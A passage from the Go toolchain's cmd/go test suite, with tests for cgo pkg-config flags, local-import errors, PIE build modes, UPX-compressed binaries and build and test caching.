t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("env", "PKG_CONFIG")
pkgConfig := strings.TrimSpace(tg.getStdout())
testenv.MustHaveExecPath(t, pkgConfig)
if out, err := exec.Command(pkgConfig, "--atleast-pkgconfig-version", "0.24").CombinedOutput(); err != nil {
t.Skipf("%s --atleast-pkgconfig-version 0.24: %v\n%s", pkgConfig, err, out)
}
// OpenBSD's pkg-config is strict about whitespace and only
// supports backslash-escaped whitespace. It does not support
// quotes, which the normal freedesktop.org pkg-config does
// support. See https://man.openbsd.org/pkg-config.1
tg.tempFile("foo.pc", `
Name: foo
Description: The foo library
Version: 1.0.0
Cflags: -Dhello=10 -Dworld=+32 -DDEFINED_FROM_PKG_CONFIG=hello\ world
`)
tg.tempFile("foo.go", `package main
/*
#cgo pkg-config: foo
int value() {
return DEFINED_FROM_PKG_CONFIG;
}
*/
import "C"
import "os"
func main() {
if C.value() != 42 {
println("value() =", C.value(), "wanted 42")
os.Exit(1)
}
}
`)
tg.setenv("PKG_CONFIG_PATH", tg.path("."))
tg.run("run", tg.path("foo.go"))
}
func TestListTemplateContextFunction(t *testing.T) {
t.Parallel()
for _, tt := range []struct {
v string
want string
}{
{"GOARCH", runtime.GOARCH},
{"GOOS", runtime.GOOS},
{"GOROOT", filepath.Clean(runtime.GOROOT())},
{"GOPATH", os.Getenv("GOPATH")},
{"CgoEnabled", ""},
{"UseAllFiles", ""},
{"Compiler", ""},
{"BuildTags", ""},
{"ReleaseTags", ""},
{"InstallSuffix", ""},
} {
tt := tt
t.Run(tt.v, func(t *testing.T) {
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tmpl := "{{context." + tt.v + "}}"
tg.run("list", "-f", tmpl)
if tt.want == "" {
return
}
if got := strings.TrimSpace(tg.getStdout()); got != tt.want {
t.Errorf("go list -f %q: got %q; want %q", tmpl, got, tt.want)
}
})
}
}
// Test that you cannot use a local import in a package
// accessed by a non-local import (found in a GOPATH/GOROOT).
// See golang.org/issue/17475.
func TestImportLocal(t *testing.T) {
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.tempFile("src/dir/x/x.go", `package x
var X int
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "dir/x")
// Ordinary import should work.
tg.tempFile("src/dir/p0/p.go", `package p0
import "dir/x"
var _ = x.X
`)
tg.run("build", "dir/p0")
// Relative import should not.
tg.tempFile("src/dir/p1/p.go", `package p1
import "../x"
var _ = x.X
`)
tg.runFail("build", "dir/p1")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/p2/p.go", `package p2
`)
tg.tempFile("src/dir/p2/p_test.go", `package p2
import "../x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/p2")
tg.runFail("test", "dir/p2")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an xtest.
tg.tempFile("src/dir/p2/p_test.go", `package p2_test
import "../x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/p2")
tg.runFail("test", "dir/p2")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import starting with ./ should not work either.
tg.tempFile("src/dir/d.go", `package dir
import "./x"
var _ = x.X
`)
tg.runFail("build", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/d.go", `package dir
`)
tg.tempFile("src/dir/d_test.go", `package dir
import "./x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir")
tg.runFail("test", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an xtest.
tg.tempFile("src/dir/d_test.go", `package dir_test
import "./x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir")
tg.runFail("test", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import plain ".." should not work.
tg.tempFile("src/dir/x/y/y.go", `package dir
import ".."
var _ = x.X
`)
tg.runFail("build", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/x/y/y.go", `package y
`)
tg.tempFile("src/dir/x/y/y_test.go", `package y
import ".."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x/y")
tg.runFail("test", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an x test.
tg.tempFile("src/dir/x/y/y_test.go", `package y_test
import ".."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x/y")
tg.runFail("test", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import "." should not work.
tg.tempFile("src/dir/x/xx.go", `package x
import "."
var _ = x.X
`)
tg.runFail("build", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
// ... even in a test.
tg.tempFile("src/dir/x/xx.go", `package x
`)
tg.tempFile("src/dir/x/xx_test.go", `package x
import "."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x")
tg.runFail("test", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
// ... even in an xtest.
tg.tempFile("src/dir/x/xx.go", `package x
`)
tg.tempFile("src/dir/x/xx_test.go", `package x_test
import "."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x")
tg.runFail("test", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
}
func TestGoInstallPkgdir(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.makeTempdir()
pkg := tg.path(".")
tg.run("install", "-pkgdir", pkg, "sync")
tg.mustExist(filepath.Join(pkg, "sync.a"))
tg.mustNotExist(filepath.Join(pkg, "sync/atomic.a"))
tg.run("install", "-i", "-pkgdir", pkg, "sync")
tg.mustExist(filepath.Join(pkg, "sync.a"))
tg.mustExist(filepath.Join(pkg, "sync/atomic.a"))
}
// For issue 14337.
func TestParallelTest(t *testing.T) {
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.makeTempdir()
const testSrc = `package package_test
import (
"testing"
)
func TestTest(t *testing.T) {
}`
tg.tempFile("src/p1/p1_test.go", strings.Replace(testSrc, "package_test", "p1_test", 1))
tg.tempFile("src/p2/p2_test.go", strings.Replace(testSrc, "package_test", "p2_test", 1))
tg.tempFile("src/p3/p3_test.go", strings.Replace(testSrc, "package_test", "p3_test", 1))
tg.tempFile("src/p4/p4_test.go", strings.Replace(testSrc, "package_test", "p4_test", 1))
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "-p=4", "p1", "p2", "p3", "p4")
}
func TestBinaryOnlyPackages(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p1.go", `//go:binary-only-package
package p1
`)
tg.wantStale("p1", "binary-only packages are no longer supported", "p1 is binary-only, and this message should always be printed")
tg.runFail("install", "p1")
tg.grepStderr("binary-only packages are no longer supported", "did not report attempt to compile binary-only package")
tg.tempFile("src/p1/p1.go", `
package p1
import "fmt"
func F(b bool) { fmt.Printf("hello from p1\n"); if b { F(false) } }
`)
tg.run("install", "p1")
os.Remove(tg.path("src/p1/p1.go"))
tg.mustNotExist(tg.path("src/p1/p1.go"))
tg.tempFile("src/p2/p2.go", `//go:binary-only-packages-are-not-great
package p2
import "p1"
func F() { p1.F(true) }
`)
tg.runFail("install", "p2")
tg.grepStderr("no Go files", "did not complain about missing sources")
tg.tempFile("src/p1/missing.go", `//go:binary-only-package
package p1
import _ "fmt"
func G()
`)
tg.wantStale("p1", "binary-only package", "should NOT want to rebuild p1 (first)")
tg.runFail("install", "p2")
tg.grepStderr("p1: binary-only packages are no longer supported", "did not report error for binary-only p1")
tg.run("list", "-deps", "-f", "{{.ImportPath}}: {{.BinaryOnly}}", "p2")
tg.grepStdout("p1: true", "p1 not listed as BinaryOnly")
tg.grepStdout("p2: false", "p2 listed as BinaryOnly")
}
// Issue 16050.
func TestAlwaysLinkSysoFiles(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/syso")
tg.tempFile("src/syso/a.syso", ``)
tg.tempFile("src/syso/b.go", `package syso`)
tg.setenv("GOPATH", tg.path("."))
// We should see the .syso file regardless of the setting of
// CGO_ENABLED.
tg.setenv("CGO_ENABLED", "1")
tg.run("list", "-f", "{{.SysoFiles}}", "syso")
tg.grepStdout("a.syso", "missing syso file with CGO_ENABLED=1")
tg.setenv("CGO_ENABLED", "0")
tg.run("list", "-f", "{{.SysoFiles}}", "syso")
tg.grepStdout("a.syso", "missing syso file with CGO_ENABLED=0")
}
// Issue 16120.
func TestGenerateUsesBuildContext(t *testing.T) {
if runtime.GOOS == "windows" {
t.Skip("this test won't run under Windows")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/gen")
tg.tempFile("src/gen/gen.go", "package gen\n//go:generate echo $GOOS $GOARCH\n")
tg.setenv("GOPATH", tg.path("."))
tg.setenv("GOOS", "linux")
tg.setenv("GOARCH", "amd64")
tg.run("generate", "gen")
tg.grepStdout("linux amd64", "unexpected GOOS/GOARCH combination")
tg.setenv("GOOS", "darwin")
tg.setenv("GOARCH", "arm64")
tg.run("generate", "gen")
tg.grepStdout("darwin arm64", "unexpected GOOS/GOARCH combination")
}
func TestGoEnv(t *testing.T) {
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.setenv("GOOS", "freebsd") // to avoid invalid pair errors
tg.setenv("GOARCH", "arm")
tg.run("env", "GOARCH")
tg.grepStdout("^arm$", "GOARCH not honored")
tg.run("env", "GCCGO")
tg.grepStdout(".", "GCCGO unexpectedly empty")
tg.run("env", "CGO_CFLAGS")
tg.grepStdout(".", "default CGO_CFLAGS unexpectedly empty")
tg.setenv("CGO_CFLAGS", "-foobar")
tg.run("env", "CGO_CFLAGS")
tg.grepStdout("^-foobar$", "CGO_CFLAGS not honored")
tg.setenv("CC", "gcc -fmust -fgo -ffaster")
tg.run("env", "CC")
tg.grepStdout("gcc", "CC not found")
tg.run("env", "GOGCCFLAGS")
tg.grepStdout("-ffaster", "CC arguments not found")
tg.run("env", "GOVERSION")
envVersion := strings.TrimSpace(tg.stdout.String())
tg.run("version")
cmdVersion := strings.TrimSpace(tg.stdout.String())
// If 'go version' is "go version <version> <goos>/<goarch>", then
// 'go env GOVERSION' is just "<version>".
if cmdVersion == envVersion || !strings.Contains(cmdVersion, envVersion) {
t.Fatalf("'go env GOVERSION' %q should be a shorter substring of 'go version' %q", envVersion, cmdVersion)
}
}
const (
noMatchesPattern = `(?m)^ok.*\[no tests to run\]`
okPattern = `(?m)^ok`
)
// Issue 18044.
func TestLdBindNow(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("LD_BIND_NOW", "1")
tg.run("help")
}
// Issue 18225.
// This is really a cmd/asm issue but this is a convenient place to test it.
func TestConcurrentAsm(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/asm")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
asm := `DATA ·constants<>+0x0(SB)/8,$0
GLOBL ·constants<>(SB),8,$8
`
tg.tempFile("go/src/p/a.s", asm)
tg.tempFile("go/src/p/b.s", asm)
tg.tempFile("go/src/p/p.go", `package p`)
tg.setenv("GOPATH", tg.path("go"))
tg.run("build", "p")
}
// Issue 18975.
func TestFFLAGS(t *testing.T) {
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("p/src/p/main.go", `package main
// #cgo FFLAGS: -no-such-fortran-flag
import "C"
func main() {}
`)
tg.tempFile("p/src/p/a.f", `! comment`)
tg.setenv("GOPATH", tg.path("p"))
// This should normally fail because we are passing an unknown flag,
// but issue #19080 points to Fortran compilers that succeed anyhow.
// To work either way we call doRun directly rather than run or runFail.
tg.doRun([]string{"build", "-x", "p"})
tg.grepStderr("no-such-fortran-flag", `missing expected "-no-such-fortran-flag"`)
}
// Issue 19198.
// This is really a cmd/link issue but this is a convenient place to test it.
func TestDuplicateGlobalAsmSymbols(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/asm")
tooSlow(t)
if runtime.GOARCH != "386" && runtime.GOARCH != "amd64" {
t.Skipf("skipping test on %s", runtime.GOARCH)
}
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
asm := `
#include "textflag.h"
DATA sym<>+0x0(SB)/8,$0
GLOBL sym<>(SB),(NOPTR+RODATA),$8
TEXT ·Data(SB),NOSPLIT,$0
MOVB sym<>(SB), AX
MOVB AX, ret+0(FP)
RET
`
tg.tempFile("go/src/a/a.s", asm)
tg.tempFile("go/src/a/a.go", `package a; func Data() uint8`)
tg.tempFile("go/src/b/b.s", asm)
tg.tempFile("go/src/b/b.go", `package b; func Data() uint8`)
tg.tempFile("go/src/p/p.go", `
package main
import "a"
import "b"
import "C"
func main() {
_ = a.Data() + b.Data()
}
`)
tg.setenv("GOPATH", tg.path("go"))
exe := tg.path("p.exe")
tg.creatingTemp(exe)
tg.run("build", "-o", exe, "p")
}
func copyFile(src, dst string, perm fs.FileMode) error {
sf, err := os.Open(src)
if err != nil {
return err
}
defer sf.Close()
df, err := os.OpenFile(dst, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
if err != nil {
return err
}
_, err = io.Copy(df, sf)
err2 := df.Close()
if err != nil {
return err
}
return err2
}
func TestNeedVersion(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/compile")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("goversion.go", `package main; func main() {}`)
path := tg.path("goversion.go")
tg.setenv("TESTGO_VERSION", "go1.testgo")
tg.runFail("run", path)
tg.grepStderr("compile", "does not match go tool version")
}
func TestBuildmodePIE(t *testing.T) {
if testing.Short() && testenv.Builder() == "" {
t.Skipf("skipping in -short mode on non-builder")
}
platform := fmt.Sprintf("%s/%s", runtime.GOOS, runtime.GOARCH)
switch platform {
case "linux/386", "linux/amd64", "linux/arm", "linux/arm64", "linux/ppc64le", "linux/riscv64", "linux/s390x",
"android/amd64", "android/arm", "android/arm64", "android/386",
"freebsd/amd64",
"windows/386", "windows/amd64", "windows/arm":
case "darwin/amd64":
default:
t.Skipf("skipping test because buildmode=pie is not supported on %s", platform)
}
t.Run("non-cgo", func(t *testing.T) {
testBuildmodePIE(t, false, true)
})
if canCgo {
switch runtime.GOOS {
case "darwin", "freebsd", "linux", "windows":
t.Run("cgo", func(t *testing.T) {
testBuildmodePIE(t, true, true)
})
}
}
}
func TestWindowsDefaultBuildmodIsPIE(t *testing.T) {
if testing.Short() && testenv.Builder() == "" {
t.Skipf("skipping in -short mode on non-builder")
}
if runtime.GOOS != "windows" {
t.Skip("skipping windows only test")
}
t.Run("non-cgo", func(t *testing.T) {
testBuildmodePIE(t, false, false)
})
if canCgo {
t.Run("cgo", func(t *testing.T) {
testBuildmodePIE(t, true, false)
})
}
}
func testBuildmodePIE(t *testing.T, useCgo, setBuildmodeToPIE bool) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
var s string
if useCgo {
s = `import "C";`
}
tg.tempFile("main.go", fmt.Sprintf(`package main;%s func main() { print("hello") }`, s))
src := tg.path("main.go")
obj := tg.path("main.exe")
args := []string{"build"}
if setBuildmodeToPIE {
args = append(args, "-buildmode=pie")
}
args = append(args, "-o", obj, src)
tg.run(args...)
switch runtime.GOOS {
case "linux", "android", "freebsd":
f, err := elf.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Type != elf.ET_DYN {
t.Errorf("PIE type must be ET_DYN, but %s", f.Type)
}
case "darwin":
f, err := macho.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Flags&macho.FlagDyldLink == 0 {
t.Error("PIE must have DyldLink flag, but not")
}
if f.Flags&macho.FlagPIE == 0 {
t.Error("PIE must have PIE flag, but not")
}
case "windows":
f, err := pe.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Section(".reloc") == nil {
t.Error(".reloc section is not present")
}
if (f.FileHeader.Characteristics & pe.IMAGE_FILE_RELOCS_STRIPPED) != 0 {
t.Error("IMAGE_FILE_RELOCS_STRIPPED flag is set")
}
var dc uint16
switch oh := f.OptionalHeader.(type) {
case *pe.OptionalHeader32:
dc = oh.DllCharacteristics
case *pe.OptionalHeader64:
dc = oh.DllCharacteristics
if (dc & pe.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA) == 0 {
t.Error("IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA flag is not set")
}
default:
t.Fatalf("unexpected optional header type of %T", f.OptionalHeader)
}
if (dc & pe.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) == 0 {
t.Error("IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag is not set")
}
if useCgo {
// Test that only one symbol is exported (#40795).
// PIE binaries don´t require .edata section but unfortunately
// binutils doesn´t generate a .reloc section unless there is
// at least one symbol exported.
// See https://sourceware.org/bugzilla/show_bug.cgi?id=19011
section := f.Section(".edata")
if section == nil {
t.Skip(".edata section is not present")
}
// TODO: deduplicate this struct from cmd/link/internal/ld/pe.go
type IMAGE_EXPORT_DIRECTORY struct {
_ [2]uint32
_ [2]uint16
_ [2]uint32
NumberOfFunctions uint32
NumberOfNames uint32
_ [3]uint32
}
var e IMAGE_EXPORT_DIRECTORY
if err := binary.Read(section.Open(), binary.LittleEndian, &e); err != nil {
t.Fatalf("binary.Read failed: %v", err)
}
// Only _cgo_dummy_export should be exported
if e.NumberOfFunctions != 1 {
t.Fatalf("got %d exported functions; want 1", e.NumberOfFunctions)
}
if e.NumberOfNames != 1 {
t.Fatalf("got %d exported names; want 1", e.NumberOfNames)
}
}
default:
panic("unreachable")
}
out, err := exec.Command(obj).CombinedOutput()
if err != nil {
t.Fatal(err)
}
if string(out) != "hello" {
t.Errorf("got %q; want %q", out, "hello")
}
}
func TestUpxCompression(t *testing.T) {
if runtime.GOOS != "linux" ||
(runtime.GOARCH != "amd64" && runtime.GOARCH != "386") {
t.Skipf("skipping upx test on %s/%s", runtime.GOOS, runtime.GOARCH)
}
testenv.MustHaveExecPath(t, "upx")
out, err := exec.Command("upx", "--version").CombinedOutput()
if err != nil {
t.Fatalf("upx --version failed: %v", err)
}
// upx --version prints `upx <version>` in the first line of output:
// upx 3.94
// [...]
re := regexp.MustCompile(`([[:digit:]]+)\.([[:digit:]]+)`)
upxVersion := re.FindStringSubmatch(string(out))
if len(upxVersion) != 3 {
t.Fatalf("bad upx version string: %s", upxVersion)
}
major, err1 := strconv.Atoi(upxVersion[1])
minor, err2 := strconv.Atoi(upxVersion[2])
if err1 != nil || err2 != nil {
t.Fatalf("bad upx version string: %s", upxVersion[0])
}
// Anything below 3.94 is known not to work with go binaries
if (major < 3) || (major == 3 && minor < 94) {
t.Skipf("skipping because upx version %v.%v is too old", major, minor)
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main; import "fmt"; func main() { fmt.Print("hello upx") }`)
src := tg.path("main.go")
obj := tg.path("main")
tg.run("build", "-o", obj, src)
out, err = exec.Command("upx", obj).CombinedOutput()
if err != nil {
t.Logf("executing upx\n%s\n", out)
t.Fatalf("upx failed with %v", err)
}
out, err = exec.Command(obj).CombinedOutput()
if err != nil {
t.Logf("%s", out)
t.Fatalf("running compressed go binary failed with error %s", err)
}
if string(out) != "hello upx" {
t.Fatalf("bad output from compressed go binary:\ngot %q; want %q", out, "hello upx")
}
}
func TestCacheListStale(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("gopath/src/p/p.go", "package p; import _ \"q\"; func F(){}\n")
tg.tempFile("gopath/src/q/q.go", "package q; func F(){}\n")
tg.tempFile("gopath/src/m/m.go", "package main; import _ \"q\"; func main(){}\n")
tg.setenv("GOPATH", tg.path("gopath"))
tg.run("install", "p", "m")
tg.run("list", "-f={{.ImportPath}} {{.Stale}}", "m", "q", "p")
tg.grepStdout("^m false", "m should not be stale")
tg.grepStdout("^q true", "q should be stale")
tg.grepStdout("^p false", "p should not be stale")
}
func TestCacheCoverage(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata"))
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("c1"))
tg.run("test", "-cover", "-short", "strings")
tg.run("test", "-cover", "-short", "math", "strings")
}
func TestIssue22588(t *testing.T) {
// Don't get confused by stderr coming from tools.
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
if _, err := os.Stat("/usr/bin/time"); err != nil {
t.Skip(err)
}
tg.run("list", "-f={{.Stale}}", "runtime")
tg.run("list", "-toolexec=/usr/bin/time", "-f={{.Stale}}", "runtime")
tg.grepStdout("false", "incorrectly reported runtime as stale")
}
func TestIssue22531(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("src/m/main.go", "package main /* c1 */; func main() {}\n")
tg.run("install", "-x", "m")
tg.run("list", "-f", "{{.Stale}}", "m")
tg.grepStdout("false", "reported m as stale after install")
tg.run("tool", "buildid", tg.path("bin/m"+exeSuffix))
// The link action ID did not include the full main build ID,
// even though the full main build ID is written into the
// eventual binary. That caused the following install to
// be a no-op, thinking the gofmt binary was up-to-date,
// even though .Stale could see it was not.
tg.tempFile("src/m/main.go", "package main /* c2 */; func main() {}\n")
tg.run("install", "-x", "m")
tg.run("list", "-f", "{{.Stale}}", "m")
tg.grepStdout("false", "reported m as stale after reinstall")
tg.run("tool", "buildid", tg.path("bin/m"+exeSuffix))
}
func TestIssue22596(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("gopath1/src/p/p.go", "package p; func F(){}\n")
tg.tempFile("gopath2/src/p/p.go", "package p; func F(){}\n")
tg.setenv("GOPATH", tg.path("gopath1"))
tg.run("list", "-f={{.Target}}", "p")
target1 := strings.TrimSpace(tg.getStdout())
tg.run("install", "p")
tg.wantNotStale("p", "", "p stale after install")
tg.setenv("GOPATH", tg.path("gopath2"))
tg.run("list", "-f={{.Target}}", "p")
target2 := strings.TrimSpace(tg.getStdout())
tg.must(os.MkdirAll(filepath.Dir(target2), 0777))
tg.must(copyFile(target1, target2, 0666))
tg.wantStale("p", "build ID mismatch", "p not stale after copy from gopath1")
tg.run("install", "p")
tg.wantNotStale("p", "", "p stale after install2")
}
func TestTestCache(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.setenv("GOCACHE", tg.path("cache"))
// The -p=1 in the commands below just makes the -x output easier to read.
t.Log("\n\nINITIAL\n\n")
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 1\n")
tg.tempFile("src/p2/p2.go", "package p2\nimport _ \"p1\"\nvar X = 1\n")
tg.tempFile("src/t/t1/t1_test.go", "package t\nimport \"testing\"\nfunc Test1(*testing.T) {}\n")
tg.tempFile("src/t/t2/t2_test.go", "package t\nimport _ \"p1\"\nimport \"testing\"\nfunc Test2(*testing.T) {}\n")
tg.tempFile("src/t/t3/t3_test.go", "package t\nimport \"p1\"\nimport \"testing\"\nfunc Test3(t *testing.T) {t.Log(p1.X)}\n")
tg.tempFile("src/t/t4/t4_test.go", "package t\nimport \"p2\"\nimport \"testing\"\nfunc Test4(t *testing.T) {t.Log(p2.X)}")
tg.run("test", "-x", "-v", "-short", "t/...")
t.Log("\n\nREPEAT\n\n")
tg.run("test", "-x", "-v", "-short", "t/...")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t1")
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t2")
tg.grepStdout(`ok \tt/t3\t\(cached\)`, "did not cache t3")
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t4")
tg.grepStderrNot(`[\\/](compile|gccgo) `, "incorrectly ran compiler")
tg.grepStderrNot(`[\\/](link|gccgo) `, "incorrectly ran linker")
tg.grepStderrNot(`p[0-9]\.test`, "incorrectly ran test")
t.Log("\n\nCOMMENT\n\n")
// Changing the program text without affecting the compiled package
// should result in the package being rebuilt but nothing more.
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 01\n")
tg.run("test", "-p=1", "-x", "-v", "-short", "t/...")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t1")
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t2")
tg.grepStdout(`ok \tt/t3\t\(cached\)`, "did not cache t3")
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t4")
tg.grepStderrNot(`([\\/](compile|gccgo) ).*t[0-9]_test\.go`, "incorrectly ran compiler")
tg.grepStderrNot(`[\\/](link|gccgo) `, "incorrectly ran linker")
tg.grepStderrNot(`t[0-9]\.test.*test\.short`, "incorrectly ran test")
t.Log("\n\nCHANGE\n\n")
// Changing the actual package should have limited effects.
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 02\n")
tg.run("test", "-p=1", "-x", "-v", "-short", "t/...")
// p2 should have been rebuilt.
tg.grepStderr(`([\\/]compile|gccgo).*p2.go`, "did not recompile p2")
// t1 does not import anything, should not have been rebuilt.
tg.grepStderrNot(`([\\/]compile|gccgo).*t1_test.go`, "incorrectly recompiled t1")
tg.grepStderrNot(`([\\/]link|gccgo).*t1_test`, "incorrectly relinked t1_test")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t/t1")
// t2 imports p1 and must be rebuilt and relinked,
// but the change should not have any effect on the test binary,
// so the test should not have been rerun.
tg.grepStderr(`([\\/]compile|gccgo).*t2_test.go`, "did not recompile t2")
tg.grepStderr(`([\\/]link|gccgo).*t2\.test`, "did not relink t2_test")
// This check does not currently work with gccgo, as garbage
// collection of unused variables is not turned on by default.
if runtime.Compiler != "gccgo" {
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t/t2")
}
// t3 imports p1, and changing X changes t3's test binary.
tg.grepStderr(`([\\/]compile|gccgo).*t3_test.go`, "did not recompile t3")
tg.grepStderr(`([\\/]link|gccgo).*t3\.test`, "did not relink t3_test")
tg.grepStderr(`t3\.test.*-test.short`, "did not rerun t3_test")
tg.grepStdoutNot(`ok \tt/t3\t\(cached\)`, "reported cached t3_test result")
// t4 imports p2, but p2 did not change, so t4 should be relinked, not recompiled,
// and not rerun.
tg.grepStderrNot(`([\\/]compile|gccgo).*t4_test.go`, "incorrectly recompiled t4")
tg.grepStderr(`([\\/]link|gccgo).*t4\.test`, "did not relink t4_test")
// This check does not currently work with gccgo, as garbage
// collection of unused variables is not turned on by default.
if runtime.Compiler != "gccgo" {
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t/t4")
}
}
func TestTestSkipVetAfterFailedBuild(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("x_test.go", `package x
func f() {
return 1
}
`)
tg.runFail("test", tg.path("x_test.go"))
tg.grepStderrNot(`vet`, "vet should be skipped after the failed build")
}
func TestTestVetRebuild(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
// golang.org/issue/23701.
// b_test imports b with augmented method from export_test.go.
// b_test also imports a, which imports b.
// Must not accidentally see un-augmented b propagate through a to b_test.
tg.tempFile("src/a/a.go", `package a
import "b"
type Type struct{}
func (*Type) M() b.T {return 0}
`)
tg.tempFile("src/b/b.go", `package b
type T int
type I interface {M() T}
`)
tg.tempFile("src/b/export_test.go", `package b
func (*T) Method() *T { return nil }
`)
tg.tempFile("src/b/b_test.go", `package b_test
import (
"testing"
"a"
. "b"
)
func TestBroken(t *testing.T) {
x := new(T)
x.Method()
_ = new(a.Type)
}
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "b")
tg.run("vet", "b")
}
func TestInstallDeps(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 1\n")
tg.tempFile("src/p2/p2.go", "package p2\nimport _ \"p1\"\n")
tg.tempFile("src/main1/main.go", "package main\nimport _ \"p2\"\nfunc main() {}\n")
tg.run("list", "-f={{.Target}}", "p1")
